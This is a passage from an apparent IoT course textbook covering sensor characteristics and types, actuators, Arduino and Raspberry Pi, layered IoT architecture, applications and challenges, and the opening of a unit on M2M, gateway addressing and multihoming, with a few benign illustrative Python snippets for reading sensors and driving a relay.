The output of the sensor is a signal that is converted into a usable, readable form, such as a
change in resistance, capacitance or impedance.

8.6.1. Characteristics of a Sensor


The static accuracy of a sensor indicates how much the sensor signal correctly represents the
measured quantity after it stabilizes (i.e. beyond the transient period.) Important static
characteristics of sensors include sensitivity, resolution, linearity, zero drift and full-scale
drift, range, repeatability and reproducibility.

1. Sensitivity is a measure of the change in the output of the sensor relative to a unit change
in the input (the measured quantity). Example: the speakers you purchase for your
home entertainment system may have a rated sensitivity of 89 dB Sound Pressure Level per
Watt per meter.

2. Resolution is the smallest amount of change in the input that can be detected and
accurately indicated by the sensor. Example: What is the resolution of an ordinary
ruler? of a Vernier Calipers?

3. Linearity is determined by the calibration curve. The static calibration curve plots the
output amplitude versus the input amplitude under static conditions. Its degree of
resemblance to a straight line describes the linearity.

4. Drift is the deviation from a specific reading of the sensor when the sensor is kept at
that value for a prolonged period of time. The zero drift refers to the change in sensor
output if the input is kept steady at a level that (initially) yields a zero reading.
Similarly, the full-scale drift is the drift if the input is maintained at a value which
originally yields a full-scale deflection. Reasons for drift may be extraneous, such as
changes in ambient pressure, humidity, temperature etc., or due to changes in the
constituents of the sensor itself, such as aging, wear etc.

5. The range of a sensor is determined by the allowed lower and upper limits of its input
or output. Usually the range is determined by the accuracy required. Sometimes the
range may simply be determined by physical limitations, for example the length of a
pocket ruler.

6. Repeatability is defined as the deviation between measurements in a sequence when
the object under test is the same and the measured value is approached from the same
direction each time. The measurements have to be made within a short enough time
duration so as not to allow significant long-term drift. Repeatability is usually specified
as a percentage of the sensor range.
7. Reproducibility is the same as repeatability, except that it also incorporates long time
lapses between subsequent measurements. The sensor has to be in operation between
measurements, but must be calibrated. Reproducibility is specified as a percentage of
the sensor range per unit of time.

The dynamic characteristics of a sensor represent the time response of the sensor system.
Knowledge of these is essential to use a sensor fruitfully. Important common dynamic
responses of sensors include rise time, delay time, peak time, settling time, percentage error
and steady-state error.
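
As a small worked illustration of the static characteristics above (not taken from the text), the snippet below estimates the sensitivity (the slope of the static calibration curve) and the zero offset of a sensor from a few calibration points using an ordinary least-squares line fit. The calibration numbers are invented for the example.

# Illustrative only: estimate sensitivity and zero offset of a sensor
# from a few (input, output) calibration points using a least-squares line fit.
# The calibration values below are invented for the example.

inputs  = [0.0, 10.0, 20.0, 30.0, 40.0]       # measured quantity (e.g. degrees C)
outputs = [0.02, 1.01, 2.05, 2.98, 4.03]      # sensor output (e.g. volts)

n = len(inputs)
mean_x = sum(inputs) / n
mean_y = sum(outputs) / n

# Slope of the best-fit line = sensitivity (output change per unit input change)
sensitivity = sum((x - mean_x) * (y - mean_y) for x, y in zip(inputs, outputs)) / \
              sum((x - mean_x) ** 2 for x in inputs)
zero_offset = mean_y - sensitivity * mean_x   # output when the input is zero

print(f"Sensitivity: {sensitivity:.4f} V per unit input")
print(f"Zero offset: {zero_offset:.4f} V")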

8.6.2. Classification of Sensors


The common IoT sensors include:

Temperature sensors, Pressure sensors, Motion sensors, Level sensors, Image sensors,
Proximity sensors, Water quality sensors, Chemical sensors, Gas sensors, Smoke sensors,
Infrared (IR) sensors, Humidity sensors, etc.
A description of each of these sensors is provided below.

Temperature sensors

Temperature sensors detect the temperature of the air or of a physical object and convert that
temperature level into an electrical signal that can be calibrated to accurately reflect the
measured temperature. These sensors could monitor the temperature of the soil to help with
agricultural output, or the temperature of a bearing operating in a critical piece of equipment
to sense when it might be overheating or nearing the point of failure.
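
As a hedged illustration (not part of the original text), the sketch below reads a DS18B20 digital temperature sensor on a Raspberry Pi through the Linux 1-Wire sysfs interface. It assumes the 1-Wire interface is enabled and that exactly one DS18B20 is attached; the "28-*" device ID in the path is assigned by the kernel.

# Minimal sketch: reading a DS18B20 temperature sensor on a Raspberry Pi
# through the Linux 1-Wire sysfs interface. Assumes the 1-Wire interface is
# enabled and exactly one DS18B20 is attached.
import glob
import time

def read_celsius():
    device_file = glob.glob("/sys/bus/w1/devices/28-*/w1_slave")[0]
    with open(device_file) as f:
        lines = f.readlines()
    # The second line ends with "t=<temperature in millidegrees Celsius>"
    millideg = int(lines[1].split("t=")[-1])
    return millideg / 1000.0

if __name__ == "__main__":
    while True:
        print(f"Measured temperature: {read_celsius():.1f} degrees C")
        time.sleep(5)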

Pressure sensors

Pressure sensors measure the pressure or force per unit area applied to the sensor and can
detect things such as atmospheric pressure, the pressure of a stored gas or liquid in a sealed
system such as a tank or pressure vessel, or the weight of an object.

Motion sensors

Motion sensors or detectors can sense the movement of a physical object by using any one of
several technologies, including passive infrared (PIR), microwave detection, or ultrasonic,
which uses sound to detect objects. These sensors can be used in security and intrusion
detection systems, but can also be used to automate the control of doors, sinks, air
conditioning and heating, or other systems.

Level sensors

Level sensors translate the level of a liquid relative to a benchmark normal value into a
signal. Fuel gauges, for example, display the level of fuel in a vehicle's tank and provide a
continuous level reading. There are also point level sensors, which give a go/no-go or digital
representation of the level of the liquid. Some automobiles have a light that illuminates when
the fuel tank level is very close to empty, acting as an alarm that warns the driver that the fuel
is about to run out completely.

Image sensors

Image sensors function to capture images to be digitally stored for processing. License plate
readers are an example, as well as facial recognition systems. Automated production lines can
use image sensors to detect issues with quality such as how well a surface is painted after
leaving the spray booth.

Proximity sensors

Proximity sensors can detect the presence or absence of objects that approach the sensor
through a variety of different technology designs.

Water quality sensors

The importance of water to human beings, not only for drinking but as a key ingredient
needed in many production processes, dictates the need to sense and measure parameters
related to water quality. Some examples of what is sensed and monitored include:

Chemical presence (such as chlorine or fluoride levels), oxygen levels (which may impact the
growth of algae and bacteria), electrical conductivity (which can indicate the level of ions
present in water), pH level (a reflection of the relative acidity or alkalinity of the water), and
turbidity levels (a measurement of the amount of suspended solids in water).

Chemical sensors

Chemical sensors are designed to detect the presence of specific chemical substances that
may have inadvertently leaked from their containers into spaces occupied by personnel; they
are also useful in controlling industrial process conditions.

Gas sensors

Related to chemical sensors, gas sensors are tuned to detect the presence of combustible,
toxic, or flammable gas in the vicinity of the sensor. Examples of specific gases that can be
detected include:

Bromine (Br2), Carbon Monoxide (CO), Chlorine (Cl2), Chlorine Dioxide (ClO2), Hydrogen
Cyanide (HCN), Hydrogen Peroxide (H2O2), Hydrogen Sulfide (H2S), Nitric Oxide (NO),
Nitrogen Dioxide (NO2), Ozone (O3), etc.
Smoke sensors

Smoke sensors or detectors pick up the presence of smoke, which could be an indication of a
fire, typically using optical sensing (photoelectric detection) or ionization detection.

Infrared (IR) sensors


Infrared sensor technologies detect infrared radiation that is emitted by objects. Non-contact
thermometers make use of these types of sensors as a way of measuring the temperature of an
object without having to directly place a probe or sensor on that object. They find use in
analyzing the heat signature of electronics and detecting blood flow or blood pressure in
patients.

Acceleration sensors

While motion sensors detect the movement of an object, acceleration sensors, or accelerometers
as they are also known, detect the rate of change of velocity of an object. This change may be
due to a free-fall condition, a sudden vibration that is causing movement with speed changes,
or rotational motion (a directional change).

8.7. Actuators

An actuator is a machine component or system that moves or controls a mechanism or a
system. Sensors in the device sense the environment, then control signals are generated for
the actuators according to the actions that need to be performed. Actuators convert an
electrical signal into a corresponding physical quantity such as movement, force or sound.

8.7.1. Types of Actuators


1. Servo Motors:

A servo is a small device that incorporates a two-wire DC motor, a gear train, a potentiometer,
an integrated circuit, and a shaft (output spline).

2. Stepper Motors:

Stepper motors are DC motors that move in discrete steps. They have multiple coils that
are organized in groups called “phases”. By energizing each phase in sequence, the motor
will rotate, one step at a time. With a computer controlled stepping, you can achieve very
precise positioning and/or speed control.

3. DC Motors (Continuous Rotation Motors):

A Direct Current (DC) motor is the most common actuator used in projects. They are simple,
cheap, and easy to use. DC motors convert electrical energy into mechanical energy. They also
come in different sizes.

4. Linear actuator:

A linear actuator is an actuator that creates motion in a straight line, in contrast to the circular
motion of a conventional electric motor. Linear actuators are used in machine tools and
industrial machinery, in computer peripherals such as disk drives and printers, in valves and
dampers, and in many other places where linear motion is required.

5. Relay:

A relay is an electrically operated switch. Many relays use an electromagnet to mechanically
operate a switch. The advantage of relays is that it takes a relatively small amount of power to
operate the relay coil, but the relay itself can be used to control motors, heaters, lamps or AC
circuits which themselves can draw a lot more electrical power.

6. Solenoid:
A solenoid is simply a specially designed electromagnet. Solenoids are inexpensive, and their
use is primarily limited to on-off applications such as latching, locking, and triggering. They
are frequently used in home appliances (e.g. washing machine valves), office equipment (e.g.
copy machines), automobiles (e.g. door latches and the starter solenoid), pinball machines
(e.g., plungers and bumpers), and factory automation.
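
As a hedged illustration of driving one of the simpler actuators above (a relay) from software, the sketch below switches a relay wired to a Raspberry Pi GPIO pin using the RPi.GPIO library. The pin number and the on-time are arbitrary choices made for the example, not values from the text.

# Illustrative sketch: driving a relay (an on/off actuator) from a Raspberry Pi
# GPIO pin with the RPi.GPIO library. The pin number and timing are assumptions
# made for the example; adapt them to the actual wiring.
import time
import RPi.GPIO as GPIO

RELAY_PIN = 17          # BCM pin the relay module's control input is wired to

GPIO.setmode(GPIO.BCM)
GPIO.setup(RELAY_PIN, GPIO.OUT, initial=GPIO.LOW)

try:
    GPIO.output(RELAY_PIN, GPIO.HIGH)   # energise the relay coil (load on)
    time.sleep(5)                       # keep the load on for 5 seconds
    GPIO.output(RELAY_PIN, GPIO.LOW)    # de-energise the coil (load off)
finally:
    GPIO.cleanup()                      # release the GPIO pin on exit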

8.8.Computing Components (Arduino, Raspberry Pi)


 Arduino Board: An Arduino is actually a microcontroller based kit.
 It is basically used in communications and in controlling or operating many devices.
 Arduino UNO board is the most popular board in the Arduino board family.
 In addition, it is the best board to get started with electronics and coding.
 Some boards look a bit different from one another, but most Arduinos have the
majority of these components in common.
 It consists of two memories- Program memory and the data memory.
 The code is stored in the flash program memory, whereas the data is stored in the data
memory.
 Arduino Uno consists of 14 digital input/output pins (of which 6 can be used as PWM
outputs), 6 analog inputs, a 16 MHz crystal oscillator, a USB connection, a power
jack, an ICSP header, and a reset button.
 The main parts labelled on the board are: the power USB connector, the power (barrel)
jack, the voltage regulator, the crystal oscillator, the reset button, the power pins
(3.3 V, 5 V, GND, Vin), the analog pins, the main microcontroller, the ICSP pins, the
power LED indicator, and the TX and RX LEDs.
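
For completeness, here is a hedged sketch (not from the text) of how a host computer might read the values that an Arduino sketch prints over its USB serial link, using the pyserial library. The port name, baud rate and message format are assumptions for the example.

# Hedged example: reading lines that an Arduino sketch prints over its USB
# serial connection, using the pyserial library on the host computer.
# The port name and baud rate are assumptions for illustration.
import serial

PORT = "/dev/ttyACM0"   # typical Arduino Uno port on Linux; e.g. "COM3" on Windows
BAUD = 9600             # must match Serial.begin(...) in the Arduino sketch

with serial.Serial(PORT, BAUD, timeout=2) as link:
    for _ in range(10):                       # read ten lines, then stop
        line = link.readline().decode("ascii", errors="ignore").strip()
        if line:
            print("Arduino says:", line)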

Raspberry Pi
 The Raspberry Pi is a very cheap computer that runs Linux, but it also provides a set
of GPIO (general purpose input/output) pins that allow you to control electronic
components for physical computing and explore the Internet of Things (IoT).
 Raspberry Pi was basically introduced in 2006.
 It is particularly designed for educational use and intended for Python.
 A Raspberry Pi is a small, credit-card-sized single-board computer developed in the
United Kingdom (U.K.) by the Raspberry Pi Foundation.

There have been several generations of Raspberry Pi boards: Pi 1, Pi 2, Pi 3, and Pi 4.


 The first generation of Raspberry Pi (Pi 1) was released in the year 2012; it had two
types of models, namely Model A and Model B.
 Raspberry Pi can be plugged into a TV, computer monitor, and it uses a standard
keyboard and mouse.
 It is user friendly as can be handled by all the age groups.
 It does everything you would expect a desktop computer to do, from word processing,
browsing the internet and working with spreadsheets, to playing games and playing
high-definition videos.

 All models feature a Broadcom system on a chip (SoC) with an integrated ARM-
compatible central processing unit (CPU) and on-chip graphics processing unit
(GPU).
 Processor speed ranges from 700 MHz to 1.4 GHz for the Pi 3 Model B+ or 1.5 GHz
for the Pi 4; on-board memory ranges from 256 MB to 1 GB with up to 4 GB
available on the Pi 4 random-access memory (RAM).
 Secure Digital (SD) cards in Micro SDHC form factor (SDHC on early models) are
used to store the operating system and program memory.
 The boards have one to five USB ports. For video output, HDMI and composite video
are supported, with a standard 3.5 mm tip-ring-sleeve jack for audio output.
 Lower-level output is provided by a number of GPIO pins, which support common
protocols like I²C. The B-models have an 8P8C Ethernet port and the Pi 3 and Pi Zero
W have on-board Wi-Fi and Bluetooth.
8.9.IoT Architecture
The Reference Model introduced in 2014 by Cisco, IBM, and Intel at the 2014 IoT World
Forum has as many as seven layers. According to an official press release by Cisco forum
host, the architecture aims to “help educate CIOs, IT departments, and developers on
deployment of IoT projects, and accelerate the adoption of IoT.”
The four core layers, which the sections below extend with an edge (fog) computing layer, a
business layer and a security layer, are:
1. The perception layer hosting smart things;
2. The connectivity or transport layer transferring data from the physical layer to the
cloud and vice versa via networks and gateways;
3. The processing layer employing IoT platforms to accumulate and manage all data
streams; and
4. The application layer delivering solutions like analytics, reporting, and device control
to end users.
Perception layer: converting analog signals into digital data and vice versa
The initial stage of any IoT system embraces a wide range of “things” or endpoint devices
that act as a bridge between the real and digital worlds. They vary in form and size, from tiny
silicon chips to large vehicles. By their functions, IoT things can be divided into the
following large groups.
Sensors such as probes, gauges, meters, and others. They collect physical parameters like
temperature or humidity, turn them into electrical signals, and send them to the IoT system.
IoT sensors are typically small and consume little power.
Actuators, translating electrical signals from the IoT system into physical actions.
Machines and devices connected to sensors and actuators or having them as integral parts.
Connectivity layer: enabling data transmission
The second level is in charge of all communications across devices, networks, and cloud
services that make up the IoT infrastructure. The connectivity between the physical layer and
the cloud is achieved in two ways:
directly, using TCP or UDP/IP stack;
via gateways — hardware or software modules performing translation between different
protocols as well as encryption and decryption of IoT data.
The communications between devices and cloud services or gateways involve different
networking technologies.
Ethernet connects stationary or fixed IoT devices like security and video cameras,
permanently installed industrial equipment, and gaming consoles.
WiFi, the most popular technology of wireless networking, is a great fit for data-intensive
IoT solutions that are easy to recharge and operate within a small area. A good example of
use is smart home devices connected to the electrical grid.
NFC (Near Field Communication) enables simple and safe data sharing between two
devices over a distance of 4 inches (10 cm) or less.
Bluetooth is widely used by wearables for short-range communications. To meet the needs of
low-power IoT devices, the Bluetooth Low-Energy (BLE) standard was designed. It transfers
only small portions of data and doesn’t work for large files.
LPWAN (Low-power Wide-area Network) was created specifically for IoT devices. It
provides long-range wireless connectivity on low power consumption with a battery life of
10+ years. Sending data periodically in small portions, the technology meets the requirements
of smart cities, smart buildings, and smart agriculture (field monitoring).
ZigBee is a low-power wireless network for carrying small data packages over short
distances. The outstanding thing about ZigBee is that it can handle up to 65,000 nodes.
Created specifically for home automation, it also works for low-power devices in industrial,
scientific, and medical sites.
Cellular networks offer reliable data transfer and nearly global coverage. There are two
cellular standards developed specifically for IoT things. LTE-M (Long Term Evolution for
Machines) enables devices to communicate directly with the cloud and exchange high
volumes of data. NB-IoT or Narrowband IoT uses low-frequency channels to send small data
packages.
Edge or fog computing layer: reducing system latency
This level is essential for enabling IoT systems to meet the speed, security, and scale
requirements of the 5th generation mobile network or 5G. The new wireless standard
promises faster speeds, lower latency, and the ability to handle many more connected
devices, than the current 4G standard.
The idea behind edge or fog computing is to process and store information as early and as
close to its sources as possible. This approach allows for analyzing and transforming high
volumes of real-time data locally, at the edge of the networks. Thus, you save the time and
other resources that otherwise would be needed to send all data to cloud services. The result
is reduced system latency that leads to real-time responses and enhanced performance.
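To make the idea concrete, here is a small, purely illustrative sketch (not from the text) of edge-side processing: readings are aggregated locally and only a summary is forwarded, instead of streaming every raw sample to the cloud. The threshold value and the send_to_cloud stub are invented for the example.

# Illustrative edge/fog processing sketch: aggregate raw readings locally and
# forward only a summary, instead of sending every sample upstream.
# The threshold and the send_to_cloud() stub are assumptions for the example.
import random
import statistics

TEMP_ALERT_THRESHOLD = 80.0     # degrees Celsius; arbitrary example value

def read_sensor():
    """Stand-in for a real sensor read."""
    return random.uniform(20.0, 90.0)

def send_to_cloud(payload):
    """Stand-in for an uplink to a cloud service (e.g. via MQTT or HTTPS)."""
    print("uplink:", payload)

window = [read_sensor() for _ in range(60)]          # one minute of samples
summary = {
    "mean": round(statistics.mean(window), 2),
    "max": round(max(window), 2),
    "alerts": sum(1 for t in window if t > TEMP_ALERT_THRESHOLD),
}
send_to_cloud(summary)                               # one small message, not 60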
Processing layer: making raw data useful
The processing layer accumulates, stores, and processes data that comes from the previous
layer. All these tasks are commonly handled via IoT platforms and include two major stages.
Data accumulation stage
The real-time data is captured via an API and put at rest to meet the requirements of non-real-
time applications. The data accumulation component stage works as a transit hub between
event-based data generation and query-based data consumption.
Among other things, the stage defines whether data is relevant to the business requirements
and where it should be placed. It saves data to a wide range of storage solutions, from data
lakes capable of holding unstructured data like images and video streams to event stores and
telemetry databases. The total goal is to sort out a large amount of diverse data and store it in
the most efficient way.
Data abstraction stage
Here, data preparation is finalized so that consumer applications can use it to generate
insights. The entire process involves the following steps:
combining data from different sources, both IoT and non-IoT, including ERM, ERP, and
CRM systems; reconciling multiple data formats; and aggregating data in one place or
making it accessible regardless of location through data virtualization.
Similarly, data collected at the application layer is reformatted here for sending to the
physical level so that devices can “understand” it.
Together, the data accumulation and abstraction stages veil details of the hardware,
enhancing the interoperability of smart devices. What’s more, they let software developers
focus on solving particular business tasks — rather than on delving into the specifications of
devices from different vendors.
Application layer: addressing business requirements
At this layer, information is analyzed by software to give answers to key business questions.
There are hundreds of IoT applications that vary in complexity and function, using different
technology stacks and operating systems. Some examples are:
device monitoring and control software, mobile apps for simple interactions, business
intelligence services, and analytic solutions using machine learning.
Currently, applications can be built right on top of IoT platforms that offer software
development infrastructure with ready-to-use instruments for data mining, advanced
analytics, and data visualization. Otherwise, IoT applications use APIs to integrate with
middleware.

Business layer: Implementing data-driven solutions


The information generated at the previous layers brings value only if it results in problem-
solving solutions and the achievement of business goals. New data must initiate collaboration between
stakeholders who in turn introduce new processes to enhance productivity.
The decision-making usually involves more than one person working with more than one
software solution. For this reason, the business layer is defined as a separate stage, higher
than a single application layer.
Security layer: preventing data breaches
It goes without saying that there should be a security layer covering all the above-mentioned
layers. IoT security is a broad topic worthy of a separate article. Here we’ll only point out the
basic features of the safe architecture across different levels.
Device security. Modern manufacturers of IoT devices typically integrate security features
both in the hardware and firmware installed on it. This includes embedded TPM (Trusted
Platform Module) chips with cryptographic keys for authentication and protection of
endpoint devices;
a secure boot process that prevents unauthorized code from running on a powered-up device;
updating security patches on a regular basis; and physical protection like metal shields to
block physical access to the device.
Connection security. Whether data is being sent over devices, networks, or applications, it
should be encrypted. Otherwise, sensitive information can be read by anybody who intercepts
information in transit. IoT-centric messaging protocols like MQTT, AMQP, and DDS may
use the standard Transport Layer Security (TLS) cryptographic protocol to ensure end-to-end
data protection.
Cloud security. Data at rest stored in the cloud must be encrypted as well to mitigate risks of
exposing sensitive information to intruders. Cloud security also involves authentication and
authorization mechanisms to limit access to the IoT applications. Another important security
method is device identity management to verify the device’s credibility before allowing it to
connect to the cloud.
The good news is that IoT solutions from large providers like Microsoft, AWS, or Cisco
come with pre-built protection measures including end-to-end data encryption, device
authentication, and access control. However, it always pays to ensure that security is tight at
all levels, from the tiniest devices to complex analytical systems.

Applications of IoT
1. IoT Wearables

Wearable technology is a hallmark of IoT applications and probably is one of the earliest
industries to have deployed the IoT at its service. We happen to see Fit Bits, heart rate
monitors and smart watches everywhere these days.
One of the lesser-known wearables includes the Guardian glucose monitoring device. The
device is developed to aid people suffering from diabetes. It detects glucose levels in the
body, using a tiny electrode called glucose sensor placed under the skin and relays the
information via Radio Frequency to a monitoring device.
2. IoT Applications – Smart Home Applications

When we talk about IoT Applications, Smart Homes are probably the first thing that we think
of. The best example I can think of here is Jarvis, the AI home automation employed by
Mark Zuckerberg. There is also Allen Pan's home automation system, where functions in
the house are actuated by the use of a string of musical notes.

3. IoT Applications – Health Care


IoT applications can turn reactive medical-based systems into proactive wellness-based
systems.

The resources that current medical research uses lack critical real-world information. It
mostly relies on leftover data, controlled environments, and volunteers for medical
examination. IoT opens the way to a sea of valuable data through real-time field data,
analysis, and testing.
The Internet of Things also improves the current devices in power, precision, and
availability. IoT focuses on creating systems rather than just equipment

4. IoT Applications – Smart Cities


By now I assume most of you must have heard about the term Smart City. The hypothesis
of the optimized traffic system mentioned earlier is one of the many aspects that constitute
a smart city.
The thing about the smart city concept is that it’s very specific to a city. The problems faced
in Mumbai are very different than those in Delhi. The problems in Hong Kong are different
from New York. Even global issues, like finite clean drinking water, deteriorating air quality
and increasing urban density, occur in different intensities across cities. Hence, they affect
each city differently.
5. IoT Applications – Agriculture
Statistics estimate the ever-growing world population to reach nearly 10 billion by the year
2050. To feed such a massive population one needs to marry agriculture to technology and
obtain best results. There are numerous possibilities in this field. One of them is the Smart
Greenhouse.
A greenhouse farming technique enhances the yield of crops by controlling environmental
parameters. However, manual handling results in production loss, energy loss, and labor cost,
making the process less effective.
6. IoT Applications – Industrial Automation
This is one of the fields where both faster developments, as well as the quality of products,
are the critical factors for a higher Return on Investment. With IoT Applications, one could
even re-engineer products and their packaging to deliver better performance in both cost and
customer experience. IoT here can prove to be game changing with solutions for all the
following domains in its arsenal.
Factory Digitalization
Product flow Monitoring
Inventory Management
Safety and Security
Quality Control
Packaging optimization
Logistics and Supply Chain Optimization

8.10. Challenges of IoT


The biggest challenges for IoT adoption include:

 Security Challenges
 Regulation Challenges
 Compatibility Challenges
 Bandwidth Challenges
 Customer Expectation Challenges

Security Challenges:

Rapid advances in both technology and the complexity of cyber-attacks have meant that the
risk of security breaches has never been higher. There is an increased responsibility
for software developers to create the most secure applications possible to defend against this
threat as IoT devices are often seen as easy targets by hackers.

Regulation Challenges

We’ve already touched on how GDPR has impacted the IoT industry, however, as the
industry is still relatively new and young, it generally lacks specific regulation and oversight,
which is required to ensure that all devices are produced with a suitable level of protection
and security.

Compatibility Challenges

At the core of the IoT concept, all devices must be able to connect and communicate with
each other for data to be transferred.
The IoT industry currently lacks any compatibility standards, meaning that many devices
could all run on different standards resulting in difficulties communicating with one another
effectively.

Bandwidth Challenges

Perhaps unsurprisingly, devices and applications that rely on the ability to communicate with
each other constantly to work effectively tend to use a lot of data at once, leading to
bandwidth constraints for those using many devices at once.

Combine this with existing demands for data and broadband in the typical house, and you can
quickly see how data and bandwidth limitations can be a challenge.

Customer Expectation Challenges

Arguably the biggest hurdle for the industry relates to customer perception. For anything new
to be adopted by the masses, it has to be trusted completely.

For the IoT industry, this is a continuously evolving challenge as it relies on the ability to
actively combat security threats and reassure the general consumer market that the devices
are both safe to use and secure enough to hold vast quantities of sensitive data.
UNIT 9 IoT NETWORKING AND CONNECTIVITY
TECHNOLOGIES

9.1 Introduction
9.2 Objectives
9.3 M2M and IoT Technology
9.4 Components of IoT Implementation
9.5 Gateway Prefix Allotment
9.6 Impact of Mobility on Addressing
9.7 Multihoming
9.8 IoT Identification and Data Protocols
 IPv4, IPv6, MQTT, CoAP, XMPP, AMQP
9.9 Connectivity Technologies
 IEEE 802.15.4, ZigBee, 6LoWPAN, RFID, NFC, Bluetooth, Z-wave
9.10 Summary

9.1 INTRODUCTION

Machine-to-Machine or M2M is a technology that allows connectivity between network devices.


It allows tapping of sensor data and transmitting it over a public network. IoT technology, on the
other hand, expands the concept of M2M by creating large networks of devices in which devices
communicate with one another through cloud networking platforms. It allows users to create
high performance, fast and flexible networks that can connect a variety of devices.

9.2 OBJECTIVES
After going through this unit, you should be able to:

 Know about the M2M and IoT technology


 Know about the components required for IoT implementation
 Know about gateway prefix allotment & impact of mobility
 Know about various identification and data protocols
 Know about various connectivity technologies

9.3 M2M AND IoT TECHNOLOGY

Machine-to-Machine or M2M is a technology that allows connectivity between network devices.


This point to point connectivity is established to transfer information over public networks like
ethernet or cellular networks without human intervention. Its main purpose is to tap sensor data
and transmit it over a public network. The use of public networks makes it cost efficient. It has
many applications in the sectors like health care, insurance, business etc.

Various components that make up an M2M system are: sensors, RFID (Radio Frequency
Identification), a Wi-Fi or cellular network, and computing software which helps networking
devices to interpret data and make decisions. These M2M applications can translate data which
in turn can trigger automated actions. Various benefits offered by M2M are:

1. It reduces cost by making use of public networks and minimizing downtime.

2. It increases revenue by identifying new business opportunities.
3. It increases customer satisfaction through timely servicing of equipment and regular monitoring.

M2M Applications

Sensor telemetry is one of the first applications of M2M communication. It has been used since
the last century for transmitting operational data. Earlier, people used telephone lines, and then
radio waves, to transmit measured factors like temperature and pressure for remote monitoring.
Another example of M2M communication is the ATM. An ATM machine routes information
regarding a transaction request to the appropriate bank. The bank in turn, through its system,
approves it and allows the transaction to complete. M2M also has applications in supply chain
management (SCM), warehouse management systems (WMS), utility companies, etc. Fig 1
shows various applications of M2M.

Fig 1. Applications of M2M

Internet of Things (IoT)

Internet of Things, or IoT, is a technology that has evolved from M2M by increasing the
capabilities at both the consumer and enterprise levels. It expands the concept of M2M by creating
large networks of devices in which devices communicate with one another through cloud
networking platforms. It allows users to create high performance, fast and flexible networks that
can connect a variety of devices. Table 1 summarizes the differences between M2M and IoT
devices.

IoT is a network of physical objects, called "Things", embedded with hardware such as sensors or
actuators and software, for exchanging data with other devices over the internet. With the help of
this technology, it is possible to connect any kind of device, from simple household objects such
as kitchen appliances, baby monitors, ACs and TVs, to other objects such as cars, traffic lights
and web cameras. Connecting these objects to the internet through embedded devices allows
seamless communication between things, processes or people. Some of the applications of IoT
devices are the smart home voice assistant Alexa and smart traffic light systems.

IoT devices, when connected to cloud platforms, can support a huge and wide variety of
industrial or business applications. As the number of IoT devices increases, the problems of
storing, accessing and processing their data also emerge. IoT used together with Cloud technology
provides solutions to these problems due to the huge infrastructure provided by cloud providers.

Table 1. Difference between M2M and IoT devices

M2M – Machine 2 Machine IoT – Internet of Things

Point to point connection establishment Devices are connected through the network
and also supports connecting to global cloud
networks.

Limited amount of intelligence Decision making is enabled

Makes use of traditional communication protocols    Makes use of internet protocols like HTTP, FTP, etc.

Generally may not rely on internet connection Generally Rely on internet connection

Less scalable Highly scalable

9.4 COMPONENTS OF IoT IMPLEMENTATION

IoT systems can be implemented by four components.

1. Sensors
Sensors are devices that are capable of collecting data from the environment. There are
various types of sensors available: temperature sensors, pressure sensors, RFID tags,
light intensity detectors, electromagnetic sensors, etc.

2. Network
Data collected from sensors are passed over the network for computations to the cloud or
processing nodes. Depending upon the scale, they may be connected over LAN, MAN or
WAN. They can also be connected through wireless networks like- Bluetooth, ZigBee,
Wi-Fi, etc.

3. Analytics
The process of generating useful insights from the data collected by sensors is called
analytics. Analytics when performed in real time, can have numerous applications and
can make the IoT system efficient.

4. Action
Information obtained after analytics must be either passed to the user using some user
interface, messages, alerts, etc., or may also trigger some actions with the help of
actuators. Actuators are the devices that perform some action depending on the command
given to them over the network.

Fig 2 shows implementation of IoT. Data captured by sensors are passed on to the cloud servers
over the internet via gateways. Cloud servers in turn perform analytics and pass on the decisions
or commands to actuators.

Fig 2:IoT implementation


(Source: Reference 1)
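
To tie the four components together, here is a small simulated sketch (not from the text) of the sense, analytics and action loop; the network step is omitted and the threshold and actuator function are invented for the example.

# Illustrative sketch of a sense-analyse-act cycle for an IoT implementation.
# The threshold and the actuator stub are assumptions made for the example.
import random
import time

SOIL_MOISTURE_THRESHOLD = 30.0      # percent; arbitrary example value

def read_soil_moisture():
    """Stand-in for a real sensor read (component 1: sensor)."""
    return random.uniform(10.0, 60.0)

def set_irrigation_valve(open_valve: bool):
    """Stand-in for an actuator command (component 4: action)."""
    print("Irrigation valve", "OPEN" if open_valve else "CLOSED")

for _ in range(5):                                   # five sense-analyse-act cycles
    moisture = read_soil_moisture()                  # sense
    too_dry = moisture < SOIL_MOISTURE_THRESHOLD     # analytics (component 3)
    set_irrigation_valve(too_dry)                    # act
    time.sleep(1)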

Check your Progress 1

1. What is IoT technology?


2. State differences between M2M and IoT technology.
3. What are the various components involved in implementation of IoT?

9.5 GATEWAY PREFIX ALLOTMENT

Gateways are networking devices that connect IoT devices like sensors or controllers to Cloud.
In other ways we can say that data generated by IoT devices are transferred to Cloud servers
through IoT gateways.

The number of IoT devices is increasing at an exponential rate. These IoT devices are connected
in a LAN or a WAN. A number of IoT devices within a building, communicating to a gateway
installed in the same building over a wi-fi connection can be called an IoT LAN. Geographically
distributed LAN segments are interconnected and connected to the internet via gateways to form
IoT WAN. Devices connected within LAN have unique IP addresses but may have addresses the
same as devices of another LAN .

Gateways connect IoT LANs and WANs together. It is responsible for forwarding packets
between them on the IP layer. Since a large number of devices are connected, address space
needs to be conserved. Each connected device needs a unique address. IP addresses allocated to
devices within a gateway's jurisdiction are valid only in its domain. Same addresses may be
allocated in another gateway’s domain. Hence to maintain uniqueness, each gateway is assigned
a unique network prefix. It is used for global identification of gateways. This unique identifier
removes the need of allocating a unique IP address to each and every device connected to the
network, hence saves a lot of address space.

Gateway prefix allotment is shown in Fig 3. Here two gateway domains are shown. Both of them
are connected to the internet via a router. This router has its own address space and allows
connectivity to the internet. The router assigns a unique gateway prefix to both the gateways.
Hence packets are forwarded from the gateways to the internet via the router.

Fig 3: Gateway prefix allotment
(Source: Reference 1)

9.6 IMPACT OF MOBILITY ON ADDRESSING

When an IoT device moves from one location to another in a network, its address is affected.
The network prefix allocated to gateways changes due to mobility. WAN addresses allocated to
devices through gateways change without affecting IoT LAN addresses. This is possible
because addresses allocated within the domain of a gateway are unique. They are not affected by
the mobility of devices. These unique local addresses (ULA) are maintained independently of
global addresses. For giving internet access to these ULAs, they are connected to an application
layer proxy which routes them globally.

Gateways are attached to a remote anchor point by using protocols like IPv6. These remote
anchor points are immune to changes of network prefix. It is also possible for the nodes in a
network to establish direct connection with remote anchor points to access the internet directly
using tunneling. Fig 4 shows remote anchor points having access to gateways.

Fig 4: Remote anchor point
(Source: Reference 1)

9.7 MULTIHOMING

The practice of connecting a host to more than one network is called multihoming. This can
increase reliability and performance. Various ways to perform multihoming are:

1. Host multihoming
In this type of multihoming, a single host can be connected to two or more networks, for
